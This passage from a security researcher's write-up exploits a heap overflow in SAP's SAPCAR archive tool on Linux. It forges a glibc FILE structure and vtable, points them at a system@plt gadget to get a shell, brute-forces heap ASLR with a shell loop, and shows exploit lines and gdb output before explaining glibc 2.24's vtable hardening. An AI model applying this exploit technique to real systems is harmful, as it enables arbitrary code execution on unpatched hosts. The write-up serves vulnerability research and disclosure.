  _IO_write_ptr = 0x45454545 <error: Cannot access memory at address 0x45454545>, 
  _IO_write_end = 0x46464646 <error: Cannot access memory at address 0x46464646>, 
  _IO_buf_base = 0x47474747 <error: Cannot access memory at address 0x47474747>, 
  _IO_buf_end = 0x48484848 <error: Cannot access memory at address 0x48484848>, 
  _IO_save_base = 0x49494949 <error: Cannot access memory at address 0x49494949>, 
  _IO_backup_base = 0x50505050 <error: Cannot access memory at address 0x50505050>, 
  _IO_save_end = 0x51515151 <error: Cannot access memory at address 0x51515151>, 
  _markers = 0x52525252, 
  _chain = 0x53535353, 
  _fileno = 0x54545454, 
  _flags2 = 0x55555555, 
  _old_offset = 0x56565656, 
  _cur_column = 0x5757, 
  _vtable_offset = 0x58, 
  _shortbuf = "", 
  _lock = 0x60606060, 
  _offset = 0x61616161, 
  _codecvt = 0x62626262, 
  _wide_data = 0x63636363, 
  _freeres_list = 0x64646464, 
  _freeres_buf = 0x65656565, 
  __pad5 = 0x66666666, 
  _mode = 0x67676767, 
  _unused2 = 'A' <repeats 20 times>
}

Spawning a shell

Once in control of the execution flow, there are several alternatives to spawn a shell. Because of NX, we cannot execute code from the heap directly. However, it would be possible to place a ROP chain on the heap, and then pivot the stack pointer to the controlled memory.
Another alternative for the lazy folks is doing system("/bin/sh"). The binary itself provides a call system gadget, and because it is not a PIE executable, the location will remain fixed between runs:

$ objdump -M intel -d sapcar_721.510_linux_x86_64 | grep "<system@plt>"
000000000040bbe0 <system@plt>:
  455db1:	e8 2a 5e fb ff       	call   40bbe0 <system@plt>

The parameter to system is a pointer to the command to execute, and it is passed in the RDI register. Inspecting this register at the time of the crash, we can see that it points to the _flags field at the start of our fake FILE structure:

Stopped reason: SIGSEGV
0x0000000041424344 in ?? ()
gdb-peda$ x/xg $rdi
0xa1c870:	0x0000000080018001

This means we can place the sh string in this buffer, redirect execution to the call system gadget and get a shell.
If we make these changes and run the program, however, we are back to a segmentation fault inside _IO_feof.

=> 0x7ffff6bb9912 <_IO_feof+34>:	cmp    r10,QWORD PTR [r8+0x8]
gdb-peda$ info r r8
r8             0x60606060	0x60606060

The problem is that we have changed the flags, and the file functions are now trying to access the _lock pointer: the original value had the _IO_USER_LOCK bit (0x8000) set, which tells glibc to skip locking. We can get around this by keeping those flag bytes and appending ";sh" to them, so that the command still ends up running sh.
The only modifications from the previous exploit are changing the flags to:

file_struct += "\x01\x80;sh\x00\x00\x00" # _flags

and setting the function pointers in the vtable to the call system gadget:

vtable += struct.pack("<Q", 0x455db1) * 21

Running the binary against the updated exploit file dumps a shell:

gdb-peda$ r -vtf
Starting program: /home/ubuntu/sapcar_721.510_linux_x86_64 -vtf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:18 sapevents.dll
[New process 14925]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
process 14925 is executing new program: /bin/dash
sh: 1: �: not found
[New process 14926]
process 14926 is executing new program: /bin/dash
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)


Fighting against ASLR (dirty dirty)

So far we have only run the program inside gdb, which disables address randomization. The good news is that we only rely on a single fixed address. The location of the call system gadget will not change, the relative offsets will (most likely) not change, and we know RDI will be pointing to the shell command we want to execute. The problem is the location of our buffer in the heap.
Modern exploits usually require an information leak vulnerability in order to calculate relative addresses. I was not able to find one, so the quick and dirty approach to provide a PoC that runs outside of gdb involves brute-forcing.
Heap addresses are usually low, and after a few runs it becomes clear that the last 12 bits are fixed on any given system. We can just grab a valid value from a call to fread and run the program until that heap base is present again, which will eventually happen after a few thousand runs. On my test system, one sample address was 0x19e7798.

$ for i in `seq 1 5000`; do echo $i; ./sapcar_721.510_linux_x86_64 -vtf ; done
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:24 sapevents.dll
Segmentation fault (core dumped)
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:24 sapevents.dll
sh: 1: �: not found
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
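
The claim that the low 12 bits stay fixed can be checked with the two addresses mentioned in this post, assuming both refer to the same heap buffer: the one observed under gdb and the sample taken with ASLR enabled.

```python
PAGE_MASK = 0xfff  # low 12 bits: offset inside a 4 KiB page

gdb_address = 0xa1c798    # buffer address with ASLR disabled
aslr_address = 0x19e7798  # sample address with ASLR enabled

print(hex(gdb_address & PAGE_MASK), hex(aslr_address & PAGE_MASK))
```

Only the page-aligned part of the address changes between runs, which is what makes waiting for a repeated heap base feasible.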

Doing a real bypass of ASLR is left as an exercise for the reader.

Does this still work?

It does, unless you are running glibc versions 2.24 (released on 2016-08-04) or 2.25 (released on 2017-02-01).
Florian Weimer from Red Hat implemented some hardening in mid 2016:

This commit puts all libio vtables in a dedicated, read-only ELF section, so that they are consecutive in memory.  Before any indirect jump, the vtable pointer is checked against the section boundaries, and the process is terminated if the vtable pointer does not fall into the special ELF section.

This means our exploit would crash immediately instead of executing pointers from the vtable we constructed.
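
The check described in the commit message can be modelled in a few lines. This is a simplified sketch, not glibc's actual code, and the section boundaries below are hypothetical values chosen so that the legitimate _IO_file_jumps address from our gdb session falls inside them.

```python
def vtable_in_section(vtable_ptr, section_start, section_end):
    """Model of the range check: is the pointer inside the vtable section?"""
    return section_start <= vtable_ptr < section_end

# Hypothetical bounds of the read-only vtable section inside libc.
SECTION_START = 0x7ffff6f06000
SECTION_END = 0x7ffff6f07000

legit_vtable = 0x7ffff6f066e0        # _IO_file_jumps from the gdb session
fake_vtable = 0xa1c798 + 2 * 0xd8 + 8  # our table of pointers on the heap

print(vtable_in_section(legit_vtable, SECTION_START, SECTION_END))
print(vtable_in_section(fake_vtable, SECTION_START, SECTION_END))
```

A vtable placed on the heap can never fall inside a section that belongs to libc, so the process would be terminated before any of our pointers is used.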
At the time of writing, an up-to-date Ubuntu 16.04.2 is running glibc 2.23 by default. I suspect it takes time for distros to update the glibc version, so this ancient technique might still live for a bit longer.